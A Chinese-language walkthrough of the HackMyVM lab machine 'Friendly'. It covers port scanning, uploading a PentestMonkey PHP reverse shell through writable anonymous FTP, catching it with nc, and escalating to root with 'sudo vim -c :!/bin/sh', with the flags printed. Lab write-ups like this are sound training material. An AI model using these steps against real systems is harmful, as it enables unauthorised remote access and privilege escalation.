[HMV] Friendly

0x00 配置

攻击机 IP: 192.168.10.24

靶机 IP: 192.168.10.23

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali)-[~]
└─# nmap -sC -sV -p- 192.168.10.23
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 19:59 CST
Nmap scan report for 192.168.10.23
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root        10725 Feb 23 15:26 index.html
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:A2:9F:C0 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.55 seconds

发现了两个端口，21 (FTP) 和 80 (HTTP)，没有 SSH 端口。FTP 启用了匿名登录，先看 FTP

FTP 中只有一个 index.html，没有其他任何东西。index.html 的内容只是很普通的 Debian Apache 默认页面，只在页面的最下方有一个可疑的注释，但是目前尚不明确用途。接着查看网页

这个 index.html 的页面与 FTP 中的相同，同样没有任何线索。扫描网站后台，依旧没有发现什么有用的信息

┌──(root㉿Kali)-[~]
└─# dirsearch -u http://192.168.10.23/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.10.23/-_23-03-24_20-01-57.txt

Error Log: /root/.dirsearch/logs/errors-23-03-24_20-01-57.log

Target: http://192.168.10.23/

[20:01:57] Starting: 
[20:01:58] 403 -  278B  - /.ht_wsr.txt                                     
[20:01:58] 403 -  278B  - /.htaccess.bak1
[20:01:58] 403 -  278B  - /.htaccess.orig
[20:01:58] 403 -  278B  - /.htaccess.sample
[20:01:58] 403 -  278B  - /.htaccess.save
[20:01:58] 403 -  278B  - /.htaccess_orig
[20:01:58] 403 -  278B  - /.htaccess_extra
[20:01:58] 403 -  278B  - /.htaccessOLD
[20:01:58] 403 -  278B  - /.htaccess_sc
[20:01:58] 403 -  278B  - /.htaccessOLD2
[20:01:58] 403 -  278B  - /.htaccessBAK
[20:01:58] 403 -  278B  - /.html                                           
[20:01:58] 403 -  278B  - /.htm
[20:01:58] 403 -  278B  - /.htpasswd_test
[20:01:58] 403 -  278B  - /.httr-oauth
[20:01:58] 403 -  278B  - /.htpasswds
[20:01:59] 403 -  278B  - /.php                                            
[20:02:09] 200 -   10KB - /index.html                                       
[20:02:15] 403 -  278B  - /server-status                                    
[20:02:15] 403 -  278B  - /server-status/                                   
                                                                             
Task Completed

当我使用 SecLists 而不是默认的字典时，依旧没有任何收获，怀疑网页上可能真的只有一个 index.html，与 FTP 中相对应。这让我想到了可能我们对 FTP 具有写入权限，可以直接上传一个 PHP PentestMonkey 得到反弹 Shell

成功上传了 getshell.php 后，在浏览器中访问它，然后在攻击机上接收到了反弹 Shell

┌──(root㉿Kali)-[~]
└─# nc -lvnp 5001
listening on [any] 5001 ...
connect to [192.168.10.24] from (UNKNOWN) [192.168.10.23] 44706
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
 08:06:13 up 7 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off

$ which python3
/usr/bin/python3

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@friendly:/$ :D

获得 Shell 之后，查看靶机中存在的所有可访问的用户

www-data@friendly:/$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
RiJaba1:x:1000:1000::/home/RiJaba1:/bin/bash

发现了一个 RiJaba1 用户，查看它的家目录权限

www-data@friendly:/$ ls -al /home
ls -al /home
total 12
drwxr-xr-x  3 root    root    4096 Feb 21 07:50 .
drwxr-xr-x 18 root    root    4096 Mar 11 04:00 ..
drwxr-xr-x  5 RiJaba1 RiJaba1 4096 Mar 11 04:13 RiJaba1

www-data@friendly:/$ ls -al /home/RiJaba1
ls -al /home/RiJaba1
total 24
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 .
drwxr-xr-x 3 root    root    4096 Feb 21 07:50 ..
lrwxrwxrwx 1 RiJaba1 RiJaba1    9 Feb 23 10:18 .bash_history -> /dev/null
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 04:18 CTF
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 03:59 Private
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21 07:54 YouTube
-r--r--r-- 1 RiJaba1 RiJaba1   33 Mar 11 04:13 user.txt

我们居然对 RiJaba1 用户的家目录具有读写权限，可以无须提权直接获得 user txt

www-data@friendly:/$ cat /home/RiJaba1/user.txt
cat /home/RiJaba1/user.txt
b8cff8c9008e1c98a1f2937b4475acd6

下一步该提权到 root 来获得 root flag 了，但我还不确定是否需要先提权到 RiJaba1。检查一番家目录后并没有发现线索

www-data@friendly:/$ ls -al /home/RiJaba1/CTF
ls -al /home/RiJaba1/CTF
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 04:18 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1   21 Mar 11 04:18 ...

www-data@friendly:/$ cat "/home/RiJaba1/CTF/..."
cat "/home/RiJaba1/CTF/..."
How did you find me?

www-data@friendly:/$ ls -al /home/RiJaba1/Private
ls -al /home/RiJaba1/Private
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 03:59 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1   45 Mar 11 03:59 targets.txt

www-data@friendly:/$ cat /home/RiJaba1/Private/targets.txt
cat /home/RiJaba1/Private/targets.txt
U2hlbGxEcmVkZAp4ZXJvc2VjCnNNTApib3lyYXMyMDAK

# BASE64
# ShellDredd
# xerosec
# sML
# boyras200

www-data@friendly:/$ ls -al /home/RiJaba1/YouTube
ls -al /home/RiJaba1/YouTube
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21 07:54 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 04:13 ..
-r--r--r-- 1 RiJaba1 RiJaba1   41 Feb 21 07:54 ideas.txt

www-data@friendly:/$ cat /home/RiJaba1/YouTube/ideas.txt
cat /home/RiJaba1/YouTube/ideas.txt
What're you reading? Have you hacked me?

试试直接运行 sudo -l 查看我们可以运行的 sudo 命令

www-data@friendly:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on friendly:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on friendly:
    (ALL : ALL) NOPASSWD: /usr/bin/vim

发现了 vim！查阅 GTFObins 发现 vim 可以直接用于提权

www-data@friendly:/$ sudo vim -c ':!/bin/sh'
sudo vim -c ':!/bin/sh'

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
wlibgpm: zero screen dimension, assuming 80x25.

:!/bin/sh
# :D

查看 /root 目录下的 root flag

# ls -al /root
ls -al /root
total 28
drwx------  3 root root 4096 Mar 11 04:14 .
drwxr-xr-x 18 root root 4096 Mar 11 04:00 ..
lrwxrwxrwx  1 root root    9 Feb 23 10:18 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 Feb 21 06:38 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-r-xr-xr-x  1 root root  509 Mar 11 04:05 interfaces.sh
-r--------  1 root root   24 Mar 11 04:14 root.txt

# cat /root/root.txt
cat /root/root.txt
Not yet! Find root.txt.

root flag 不在这里？在根目录下搜索 root.txt

# find / -name root.txt 2>/dev/null
find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt

# cat /var/log/apache2/root.txt
cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f

最后我们在 /var/log/apache2 目录找到了 root.txt

0x02 总结

非常简单的靶机，一口气从头打到尾

本栏目推荐文章
• Redis - JSON human-friendly format
• CF1870B-Friendly-Arrays-题解
• Get environmentally friendly, biodegradable plastics into the market
• B. Friendly Arrays
• Friendly Arrays题解
• 题解 Friendly Spiders
• [HMV] Crack
• P1763 friendly group
• [HMV] Ripper
• [HMV] BaseME

Friendly HMVfriendly hmv friendly b-friendly-arrays human-friendly human-friendly friendly format redis friendly p1763 group friendly integers问题find hmv 题解friendly spiders friendly arrays